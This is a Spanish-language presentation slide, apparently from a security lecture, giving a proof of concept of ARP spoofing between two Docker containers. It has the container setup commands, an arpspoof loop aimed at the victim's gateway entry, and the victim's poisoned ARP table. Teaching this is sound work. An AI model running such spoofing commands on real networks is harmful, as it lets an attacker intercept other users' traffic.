
\frametitle{Prueba de concepto}

\begin{lstlisting}
docker run --name=atacante -ti ubuntu_arp bash
docker run --name=victima --ti ubuntu bash
\end{lstlisting}

El atacante hace arp-spoofing, a la victima (172.17.0.3)
\begin{lstlisting}
for i in $(seq 1 5); do  arpspoof -t 172.17.0.3 172.17.42.1 > /dev/null 2>&1 &; done;
\end{lstlisting}
Y la victima sufre el ataque

\begin{lstlisting}
$ arp -a
? (172.17.0.4) at 02:42:ac:11:00:04 [ether] on eth0
? (172.17.42.1) at 02:42:ac:11:00:04 [ether] on eth0
\end{lstlisting}

